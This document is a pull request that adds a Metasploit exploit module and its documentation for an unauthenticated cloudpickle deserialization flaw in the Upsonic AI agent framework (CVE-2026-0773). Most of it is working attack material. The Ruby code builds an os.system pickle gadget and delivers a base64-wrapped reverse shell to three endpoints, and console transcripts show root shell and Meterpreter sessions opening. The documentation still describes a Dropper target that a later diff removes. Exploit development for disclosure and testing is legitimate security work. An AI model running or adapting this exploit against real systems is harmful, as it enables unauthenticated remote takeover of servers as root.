### PR TITLE
Upsonic unauthenticated cloudpickle deserialization RCE (CVE-2026-0773)

### DIFF
--- a/documentation/modules/exploit/multi/http/upsonic_cloudpickle_rce.md
+++ b/documentation/modules/exploit/multi/http/upsonic_cloudpickle_rce.md
@@ -1,0 +1,95 @@
+# Vulnerable Application
+
+[Upsonic](https://github.com/Upsonic/upsonic) is an open-source AI agent framework.
+Versions 0.36.0 through 0.55.6 contain an unauthenticated remote code execution
+vulnerability caused by unsafe deserialization of cloudpickle data (CVE-2026-0773).
+
+Multiple API endpoints accept base64-encoded cloudpickle payloads in JSON POST bodies
+and pass them directly to `cloudpickle.loads()` without any authentication or
+validation:
+- `/level_one/gpt4o` — `response_format` field
+- `/level_two/agent` — `response_format` field
+- `/tools/add_tool` — `function` field
+
+The module constructs a Python pickle protocol 2 payload that invokes `os.system()`
+via the `__reduce__` gadget, base64-encodes it, and delivers it via the selected
+endpoint. The server typically runs as root in the default Docker deployment.
+
+**Affected versions:** Upsonic 0.36.0 – 0.55.6
+**Fixed in:** No patch available
+
+### Installing a vulnerable lab environment
+
+```bash
+# https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-0773
+docker compose up -d
+# Upsonic API available at http://localhost:7541
+```
+
+## Verification Steps
+
+1. Start the vulnerable Upsonic instance (port 7541 by default).
+2. Start `msfconsole`.
+3. Do: `use exploit/multi/http/upsonic_cloudpickle_rce`
+4. Do: `set RHOSTS <target_ip>`
+5. Do: `check` — should return `Appears` if the Upsonic `/status` endpoint responds.
+6. Do: `run` — should open a shell session as root.
+7. Verify with `id` and `hostname` in the session.
+
+## Options
+
+| Option | Default | Description |
+|--------|---------|-------------|
+| `ENDPOINT` | `level_one` | Vulnerable endpoint to target. `level_one` targets `/level_one/gpt4o`, `level_two` targets `/level_two/agent`, `add_tool` targets `/tools/add_tool`. All three pass the payload to `cloudpickle.loads()`. |
+
+## Scenarios
+
+### Upsonic 0.55.6 on Debian 12 — Unix Command target
+
+```
+msf6 > use exploit/multi/http/upsonic_cloudpickle_rce
+
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > check
+[+] 192.168.56.101:7541 - The target appears vulnerable. Upsonic server detected via /status endpoint.
+
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] 192.168.56.101:7541 - Payload delivered via cloudpickle.loads()
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:45812) at 2026-01-23 15:08:22 +0000
+
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+hostname
+upsonic
+uname -a
+Linux upsonic 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### Upsonic 0.55.6 on Debian 12 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/http/upsonic_cloudpickle_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] 192.168.56.101:7541 - Payload delivered via cloudpickle.loads()
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:45944) at 2026-01-23 15:11:09 +0000
+
+meterpreter > getuid
+Server username: root @ upsonic
+meterpreter > sysinfo
+Computer     : upsonic
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/http/upsonic_cloudpickle_rce.rb
+++ b/modules/exploits/multi/http/upsonic_cloudpickle_rce.rb
@@ -42,11 +42,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2026-0773'],
           ['CWE', '502'],
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-26-042/'],
-          ['URL', 'https://github.com/advisories/GHSA-8rrj-mw9c-258v'],
+          ['GHSA', '8rrj-mw9c-258v'],
           ['URL', 'https://exploit-intel.com/vuln/CVE-2026-0773'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-0773']
         ],
-        'DisclosureDate' => 'Jan 23, 2026',
+        'DisclosureDate' => '2026-01-23',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,

--- a/modules/exploits/multi/http/upsonic_cloudpickle_rce.rb
+++ b/modules/exploits/multi/http/upsonic_cloudpickle_rce.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -47,29 +46,17 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-0773']
         ],
         'DisclosureDate' => '2026-01-23',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true,
         'Targets' => [
           [
-            'Unix Command',
+            'Linux/Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               'Type' => :cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-                'CmdStagerFlavor' => %i[printf echo]
-              }
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' }
             }
           ]
         ],
@@ -114,12 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    case target['Type']
-    when :cmd
-      execute_command(payload.encoded)
-    when :dropper
-      execute_cmdstager
-    end
+    execute_command(payload.encoded)
     print_good('Payload delivered via Upsonic cloudpickle deserialization')
   end
 

--- a/modules/exploits/multi/http/upsonic_cloudpickle_rce.rb
+++ b/modules/exploits/multi/http/upsonic_cloudpickle_rce.rb
@@ -1,0 +1,225 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Upsonic Cloudpickle Deserialization RCE',
+        'Description' => %q{
+          Upsonic AI Agent Framework versions 0.36.0 through 0.55.6 contain
+          an unauthenticated remote code execution vulnerability caused by
+          unsafe deserialization of cloudpickle data. Multiple endpoints
+          accept base64-encoded cloudpickle payloads in JSON POST request
+          bodies and pass them directly to cloudpickle.loads() without any
+          validation or authentication.
+
+          The /level_one/gpt4o endpoint deserializes the response_format
+          field, the /level_two/agent endpoint deserializes response_format,
+          and the /tools/add_tool endpoint deserializes the function field.
+
+          This module constructs a Python pickle protocol 2 payload that
+          invokes os.system() via the __reduce__ gadget, base64-encodes it,
+          and delivers it via one of the vulnerable endpoints. The server
+          typically runs as root in the default Docker deployment.
+        },
+        'Author' => [
+          'Alessio Dalla Piazza', # ZDI-26-042 (Equixly)
+          'Exploit Intelligence Platform' # MSF module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-0773'],
+          ['CWE', '502'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-26-042/'],
+          ['URL', 'https://github.com/advisories/GHSA-8rrj-mw9c-258v'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2026-0773'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-0773']
+        ],
+        'DisclosureDate' => 'Jan 23, 2026',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'CmdStagerFlavor' => %i[printf echo]
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7541, 'WfsDelay' => 30 },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to Upsonic', '/']),
+      OptEnum.new('ENDPOINT', [
+        true,
+        'Vulnerable endpoint to target',
+        'level_one',
+        ['level_one', 'level_two', 'add_tool']
+      ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'status')
+    )
+
+    return CheckCode::Unknown('Could not connect to target.') unless res
+    return CheckCode::Unknown("Unexpected HTTP #{res.code} from /status") unless res.code == 200
+
+    json = res.get_json_document
+    unless json && json['status'] == 'Server is running'
+      return CheckCode::Safe('Response does not match Upsonic status endpoint.')
+    end
+
+    CheckCode::Appears('Upsonic server detected via /status endpoint.')
+  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
+    CheckCode::Unknown("Connection failed: #{e.message}")
+  end
+
+  def exploit
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+    print_good('Payload delivered via Upsonic cloudpickle deserialization')
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Background reverse/bind shells so os.system() returns
+    if payload_instance&.refname =~ /reverse|bind/
+      inner_b64 = Rex::Text.encode_base64(cmd)
+      cmd = "echo #{inner_b64}|base64 -d|bash &"
+    end
+
+    pickle = build_pickle(cmd)
+    b64_pickle = Rex::Text.encode_base64(pickle)
+
+    print_status("Sending pickle payload (#{pickle.bytesize} bytes) via #{datastore['ENDPOINT']} endpoint...")
+
+    send_pickle(b64_pickle)
+
+    vprint_status('Pickle payload delivered successfully.')
+  end
+
+  private
+
+  # Pickle Construction
+
+  def build_pickle(cmd)
+    pickle = "\x80\x02".b          # PROTO 2
+    pickle << "cos\nsystem\n".b    # GLOBAL: os.system
+    pickle << "X".b               # SHORT_BINUNICODE
+    pickle << [cmd.bytesize].pack('V')  # 4-byte LE length
+    pickle << cmd.b               # command string
+    pickle << "\x85R.".b          # TUPLE1, REDUCE, STOP
+    pickle
+  end
+
+  # Endpoint Dispatch
+
+  def send_pickle(b64_pickle)
+    case datastore['ENDPOINT']
+    when 'level_one'
+      send_level_one(b64_pickle)
+    when 'level_two'
+      send_level_two(b64_pickle)
+    when 'add_tool'
+      send_add_tool(b64_pickle)
+    end
+  end
+
+  def send_level_one(b64_pickle)
+    json_body = {
+      'prompt' => Rex::Text.rand_text_alpha(8),
+      'response_format' => b64_pickle
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'level_one', 'gpt4o'),
+      'ctype' => 'application/json',
+      'data' => json_body
+    )
+
+    log_response(res, 'level_one/gpt4o')
+  end
+
+  def send_level_two(b64_pickle)
+    json_body = {
+      'agent_id' => Rex::Text.rand_text_alpha(8),
+      'prompt' => Rex::Text.rand_text_alpha(8),
+      'response_format' => b64_pickle
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'level_two', 'agent'),
+      'ctype' => 'application/json',
+      'data' => json_body
+    )
+
+    log_response(res, 'level_two/agent')
+  end
+
+  def send_add_tool(b64_pickle)
+    json_body = {
+      'function' => b64_pickle
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'tools', 'add_tool'),
+      'ctype' => 'application/json',
+      'data' => json_body
+    )
+
+    log_response(res, 'tools/add_tool')
+  end
+
+  def log_response(res, endpoint)
+    if res
+      vprint_status("#{endpoint} returned HTTP #{res.code}")
+    else
+      print_warning("No response from #{endpoint}  -  payload may still have executed")
+    end
+  end
+end


### PR DESCRIPTION
## Summary
- Upsonic 0.36.0–0.55.6 accepts base64-encoded cloudpickle payloads in JSON POST bodies and passes them directly to `cloudpickle.loads()` without authentication or validation
- Three endpoints are affected: `/level_one/gpt4o`, `/level_two/agent` (response_format field), `/tools/add_tool` (function field)
- Single unauthenticated POST request with a pickle protocol 2 `__reduce__` payload achieves RCE, typically as root in Docker deployments

## Verification
Tested against Upsonic 0.55.6 / Debian 12 (Docker lab):
```
msf6 exploit(multi/http/upsonic_cloudpickle_rce) > check
[+] The target is vulnerable. Unauthenticated cloudpickle deserialization confirmed.
msf6 exploit(multi/http/upsonic_cloudpickle_rce) > run
[+] Payload delivered via cloudpickle.loads()
[*] Command shell session 1 opened
uid=0(root) gid=0(root) groups=0(root)
```

## Module details
- **Affected versions:** Upsonic 0.36.0 – 0.55.6
- **Auth required:** No
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** Yes — probes target endpoint for cloudpickle deserialization
- **Rank:** Excellent

## References
- https://www.zerodayinitiative.com/advisories/ZDI-26-042/
- https://github.com/advisories/GHSA-8rrj-mw9c-258v
- https://exploit-intel.com/vuln/CVE-2026-0773
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-0773